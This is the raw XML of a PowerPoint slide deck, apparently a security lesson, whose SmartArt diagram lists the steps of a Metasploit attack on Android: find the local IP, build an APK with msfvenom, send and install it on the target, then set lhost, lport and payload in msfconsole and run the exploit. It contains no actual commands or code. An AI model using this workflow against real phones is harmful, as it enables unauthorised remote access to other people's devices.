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840" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId15"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId16"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="261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EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess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0FEEDF0-9ED0-4D7F-AB97-F24DEA096723}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Create </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A0DD80F-58E3-4F5A-8C14-0C7F080FC469}" type="parTrans" cxnId="{26755254-41E9-4B8D-9575-AED9C008015C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5AEE57B6-452E-4D6B-9FEC-128B713CC6B5}" type="sibTrans" cxnId="{26755254-41E9-4B8D-9575-AED9C008015C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3983B1D4-E9F3-40E6-BD23-7E703B845062}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Find local </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>ip</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F492F41-738A-495A-BD66-62C92425C206}" type="parTrans" cxnId="{EE2D7EB0-2491-4620-9484-128EFCB0CCFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C87237CF-A497-41CE-A1FA-5B148B026A29}" type="sibTrans" cxnId="{EE2D7EB0-2491-4620-9484-128EFCB0CCFB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2A852870-B74D-459C-8F84-EFB9808C8E9B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>msfvenom</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00FC1841-EBE5-4A0F-B55B-2B7C57776B9B}" type="parTrans" cxnId="{14375E2C-D6C5-479B-8407-A7D83D76E72A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9151988-DAC2-4D34-9322-F9B44F78873D}" type="sibTrans" cxnId="{14375E2C-D6C5-479B-8407-A7D83D76E72A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{902514D4-9367-48BD-AB98-415C361E8095}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Install </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> on target</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8583B2DE-149D-4FA0-B8A4-627F65C95D74}" type="parTrans" cxnId="{EC73D28B-E1B0-4A21-84D6-9486C56E714D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E602F495-06AD-4078-A149-C6C8558402F7}" type="sibTrans" cxnId="{EC73D28B-E1B0-4A21-84D6-9486C56E714D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC44E0D-2E84-42AD-BFBC-B1DB0B59B688}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Send </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E0E6D07-FB18-4817-BC96-566987AEC0E5}" type="parTrans" cxnId="{664DFF4C-E1B0-4AE3-9A2D-2413214F1402}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B6560097-BCA9-4F02-8ED2-12737AEC23F1}" type="sibTrans" cxnId="{664DFF4C-E1B0-4AE3-9A2D-2413214F1402}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD13CCF9-E354-4373-B687-C856736F1065}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Install </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>apk</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59230521-6941-404E-AB39-FD1E0D3BFD4D}" type="parTrans" cxnId="{EDDAC9D5-C3EF-4E7B-B964-9C3CAD533FE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B99B1752-3797-4E89-9B32-F8A8B0A94AC1}" type="sibTrans" cxnId="{EDDAC9D5-C3EF-4E7B-B964-9C3CAD533FE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0542F929-D3C4-4E9C-A3C8-6EF7FF18FFBD}" type="parTrans" cxnId="{103B6B91-8CC9-4D40-B800-3DD59F11CB88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B503D57E-B88B-42C1-9990-439FB88B1A35}" type="sibTrans" cxnId="{103B6B91-8CC9-4D40-B800-3DD59F11CB88}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DC3B0AC-5266-485C-BEE0-5EA316ED6351}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>msfconsole</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AF62E0A-68C0-4E36-A271-5E981705ABD4}" type="parTrans" cxnId="{D9AB0AE6-F18B-4A70-BFB4-908F5D928CC4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09B5E930-7BFA-4193-A015-8BA2F8D85EED}" type="sibTrans" cxnId="{D9AB0AE6-F18B-4A70-BFB4-908F5D928CC4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{12A28CF0-4E84-404B-BD05-C93E11DD70AF}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Set </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>lport.lhost,payload</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8D02A92-D95A-43FA-89EC-C2659BCB74B4}" type="parTrans" cxnId="{297128EE-1E8D-4F19-99A9-24D20B8B8DEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CF69FEC-4148-4199-8D68-EFD55841612F}" type="sibTrans" cxnId="{297128EE-1E8D-4F19-99A9-24D20B8B8DEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7B4759E5-D090-4169-B095-7F93192E3AD7}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>exploit</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DAE1DC3E-CC13-48D5-A225-19A62ED36208}" type="parTrans" cxnId="{8CEF87E4-4159-499F-BEFD-0ED5C9C21682}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4995E391-0564-443E-81BB-2C903CC1624C}" type="sibTrans" cxnId="{8CEF87E4-4159-499F-BEFD-0ED5C9C21682}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" type="pres">
      <dgm:prSet presAssocID="{9EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6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B8A5ADE6-C095-47F2-9BD8-3724EF926095}" type="pres">
      <dgm:prSet presAssocID="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" presName="Accent1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8BB83C97-51F0-45C6-863A-E48679F22BC5}" type="pres">
      <dgm:prSet presAssocID="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" presName="Accent" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{82171282-A646-4576-AB4C-5C8A06136ED3}" type="pres">
      <dgm:prSet presAssocID="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" presName="Child1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2B9101F4-B5D1-4AB7-BC83-753D06A88415}" type="pres">
      <dgm:prSet presAssocID="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" presName="Parent1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49C4C8C0-A665-47B8-AD0B-A80BD66447C9}" type="pres">
      <dgm:prSet presAssocID="{902514D4-9367-48BD-AB98-415C361E8095}" presName="Accent2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12D2183B-C8C1-4ADD-8BFA-63A0024D79DB}" type="pres">
      <dgm:prSet presAssocID="{902514D4-9367-48BD-AB98-415C361E8095}" presName="Accent" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{47FC99C1-6CDC-4E5F-82DC-8138B26E8725}" type="pres">
      <dgm:prSet presAssocID="{902514D4-9367-48BD-AB98-415C361E8095}" presName="Child2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4E0AE086-AABF-4A0E-98D0-5626D79C154F}" type="pres">
      <dgm:prSet presAssocID="{902514D4-9367-48BD-AB98-415C361E8095}" presName="Parent2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C57F095C-D392-4DF1-8FBB-9D795D0570B7}" type="pres">
      <dgm:prSet presAssocID="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" presName="Accent3" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{339FCDE6-ACB1-4FC6-B770-034DE4C59DA1}" type="pres">
      <dgm:prSet presAssocID="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" presName="Accent" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4708EA16-D5C5-4EE2-8A83-5B988D03B274}" type="pres">
      <dgm:prSet presAssocID="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" presName="Child3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6AED50E6-1C35-4B77-9E90-501897F8F6D8}" type="pres">
      <dgm:prSet presAssocID="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" presName="Parent3" presStyleLbl="revTx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3064ED05-7C34-49F7-BF9D-60BA36B6C51D}" type="presOf" srcId="{9EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6}" destId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{08A1E01B-B7BD-45E6-B736-DFCFED367A8B}" type="presOf" srcId="{12A28CF0-4E84-404B-BD05-C93E11DD70AF}" destId="{4708EA16-D5C5-4EE2-8A83-5B988D03B274}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{6826F124-D552-49ED-8D68-8D170C587EC1}" type="presOf" srcId="{AD13CCF9-E354-4373-B687-C856736F1065}" destId="{47FC99C1-6CDC-4E5F-82DC-8138B26E8725}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{14375E2C-D6C5-479B-8407-A7D83D76E72A}" srcId="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" destId="{2A852870-B74D-459C-8F84-EFB9808C8E9B}" srcOrd="1" destOrd="0" parTransId="{00FC1841-EBE5-4A0F-B55B-2B7C57776B9B}" sibTransId="{D9151988-DAC2-4D34-9322-F9B44F78873D}"/>
    <dgm:cxn modelId="{C9004133-AF49-44B6-88B8-57CEDE8D6FE3}" type="presOf" srcId="{902514D4-9367-48BD-AB98-415C361E8095}" destId="{4E0AE086-AABF-4A0E-98D0-5626D79C154F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{9899A139-F359-4E6E-BE42-CED9B92A034E}" type="presOf" srcId="{2A852870-B74D-459C-8F84-EFB9808C8E9B}" destId="{82171282-A646-4576-AB4C-5C8A06136ED3}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{21EFD43D-4327-44DA-9B9E-C6C681F1369C}" type="presOf" srcId="{3983B1D4-E9F3-40E6-BD23-7E703B845062}" destId="{82171282-A646-4576-AB4C-5C8A06136ED3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{664DFF4C-E1B0-4AE3-9A2D-2413214F1402}" srcId="{902514D4-9367-48BD-AB98-415C361E8095}" destId="{BCC44E0D-2E84-42AD-BFBC-B1DB0B59B688}" srcOrd="0" destOrd="0" parTransId="{7E0E6D07-FB18-4817-BC96-566987AEC0E5}" sibTransId="{B6560097-BCA9-4F02-8ED2-12737AEC23F1}"/>
    <dgm:cxn modelId="{26755254-41E9-4B8D-9575-AED9C008015C}" srcId="{9EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6}" destId="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" srcOrd="0" destOrd="0" parTransId="{6A0DD80F-58E3-4F5A-8C14-0C7F080FC469}" sibTransId="{5AEE57B6-452E-4D6B-9FEC-128B713CC6B5}"/>
    <dgm:cxn modelId="{84A39D74-ACD5-4AD1-8DF9-A4C64E2726E0}" type="presOf" srcId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" destId="{6AED50E6-1C35-4B77-9E90-501897F8F6D8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{EC73D28B-E1B0-4A21-84D6-9486C56E714D}" srcId="{9EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6}" destId="{902514D4-9367-48BD-AB98-415C361E8095}" srcOrd="1" destOrd="0" parTransId="{8583B2DE-149D-4FA0-B8A4-627F65C95D74}" sibTransId="{E602F495-06AD-4078-A149-C6C8558402F7}"/>
    <dgm:cxn modelId="{103B6B91-8CC9-4D40-B800-3DD59F11CB88}" srcId="{9EFDE1E0-36B2-42FD-8BC1-DEC0FAC5CDC6}" destId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" srcOrd="2" destOrd="0" parTransId="{0542F929-D3C4-4E9C-A3C8-6EF7FF18FFBD}" sibTransId="{B503D57E-B88B-42C1-9990-439FB88B1A35}"/>
    <dgm:cxn modelId="{B01C33A7-8A0C-4A88-A482-547561053F08}" type="presOf" srcId="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" destId="{2B9101F4-B5D1-4AB7-BC83-753D06A88415}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{EE2D7EB0-2491-4620-9484-128EFCB0CCFB}" srcId="{70FEEDF0-9ED0-4D7F-AB97-F24DEA096723}" destId="{3983B1D4-E9F3-40E6-BD23-7E703B845062}" srcOrd="0" destOrd="0" parTransId="{4F492F41-738A-495A-BD66-62C92425C206}" sibTransId="{C87237CF-A497-41CE-A1FA-5B148B026A29}"/>
    <dgm:cxn modelId="{716BD3C1-0FA4-44F0-91E6-F8B446A67E49}" type="presOf" srcId="{BCC44E0D-2E84-42AD-BFBC-B1DB0B59B688}" destId="{47FC99C1-6CDC-4E5F-82DC-8138B26E8725}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{212F9BCB-0BE8-4984-85D4-24CD92875557}" type="presOf" srcId="{7B4759E5-D090-4169-B095-7F93192E3AD7}" destId="{4708EA16-D5C5-4EE2-8A83-5B988D03B274}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{EDDAC9D5-C3EF-4E7B-B964-9C3CAD533FE4}" srcId="{902514D4-9367-48BD-AB98-415C361E8095}" destId="{AD13CCF9-E354-4373-B687-C856736F1065}" srcOrd="1" destOrd="0" parTransId="{59230521-6941-404E-AB39-FD1E0D3BFD4D}" sibTransId="{B99B1752-3797-4E89-9B32-F8A8B0A94AC1}"/>
    <dgm:cxn modelId="{8CEF87E4-4159-499F-BEFD-0ED5C9C21682}" srcId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" destId="{7B4759E5-D090-4169-B095-7F93192E3AD7}" srcOrd="2" destOrd="0" parTransId="{DAE1DC3E-CC13-48D5-A225-19A62ED36208}" sibTransId="{4995E391-0564-443E-81BB-2C903CC1624C}"/>
    <dgm:cxn modelId="{D9AB0AE6-F18B-4A70-BFB4-908F5D928CC4}" srcId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" destId="{8DC3B0AC-5266-485C-BEE0-5EA316ED6351}" srcOrd="0" destOrd="0" parTransId="{4AF62E0A-68C0-4E36-A271-5E981705ABD4}" sibTransId="{09B5E930-7BFA-4193-A015-8BA2F8D85EED}"/>
    <dgm:cxn modelId="{297128EE-1E8D-4F19-99A9-24D20B8B8DEE}" srcId="{42DDB17B-32B6-4380-AEA0-A9CDCE0F4C58}" destId="{12A28CF0-4E84-404B-BD05-C93E11DD70AF}" srcOrd="1" destOrd="0" parTransId="{A8D02A92-D95A-43FA-89EC-C2659BCB74B4}" sibTransId="{8CF69FEC-4148-4199-8D68-EFD55841612F}"/>
    <dgm:cxn modelId="{1B293EFC-EB57-4EFF-B746-5E727D2F34A8}" type="presOf" srcId="{8DC3B0AC-5266-485C-BEE0-5EA316ED6351}" destId="{4708EA16-D5C5-4EE2-8A83-5B988D03B274}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F80B6E4E-8530-407B-B095-0491343B2370}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{B8A5ADE6-C095-47F2-9BD8-3724EF926095}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{F4038CEC-1F82-4468-9968-6BDEB5BCB1D6}" type="presParOf" srcId="{B8A5ADE6-C095-47F2-9BD8-3724EF926095}" destId="{8BB83C97-51F0-45C6-863A-E48679F22BC5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{55DC85B6-6B38-4AB7-9B24-C2B37206D323}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{82171282-A646-4576-AB4C-5C8A06136ED3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{0845DD23-B2D5-47E4-8AF6-83BE4803B21A}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{2B9101F4-B5D1-4AB7-BC83-753D06A88415}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{66DC735F-DB28-4FEE-93F9-5048A090D69D}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{49C4C8C0-A665-47B8-AD0B-A80BD66447C9}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{ADACEFE1-C8DE-4AB6-BA9A-19D8325C4383}" type="presParOf" srcId="{49C4C8C0-A665-47B8-AD0B-A80BD66447C9}" destId="{12D2183B-C8C1-4ADD-8BFA-63A0024D79DB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{838A538F-2E84-46BF-872C-80FD5A39DBA8}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{47FC99C1-6CDC-4E5F-82DC-8138B26E8725}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{303E99D1-4CC8-46C8-A33D-6B8C0A7640B1}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{4E0AE086-AABF-4A0E-98D0-5626D79C154F}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{66C1CF45-28B5-44CB-9914-F31D55E6D8F7}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{C57F095C-D392-4DF1-8FBB-9D795D0570B7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{34B40DFA-A669-4C4C-A55C-62901B802886}" type="presParOf" srcId="{C57F095C-D392-4DF1-8FBB-9D795D0570B7}" destId="{339FCDE6-ACB1-4FC6-B770-034DE4C59DA1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{959CB7DB-2576-45B4-B9B4-C093197DB65B}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{4708EA16-D5C5-4EE2-8A83-5B988D03B274}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2009/layout/CircleArrowProcess"/>
    <dgm:cxn modelId="{95C9BE3F-FA1A-4075-9B50-A143EF2A8060}" type="presParOf" srcId="{0746AFD6-81AF-4A03-965B-E5FD2AC99902}" destId="{6AED50E6-1C35-4B77-9E90-501897F8F6D8}" srcOrd="8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B83C97-51F0-45C6-863A-E48679F22BC5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1575203" y="0"/>
          <a:ext cx="2803597" cy="2804024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2171282-A646-4576-AB4C-5C8A06136ED3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4379327" y="835848"/>
          <a:ext cx="1682158" cy="1121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Find local </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>ip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Use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>msfvenom</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4379327" y="835848"/>
        <a:ext cx="1682158" cy="1121842"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2B9101F4-B5D1-4AB7-BC83-753D06A88415}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2194890" y="1012337"/>
          <a:ext cx="1557905" cy="7787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Create </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2600" kern="1200" dirty="0" err="1"/>
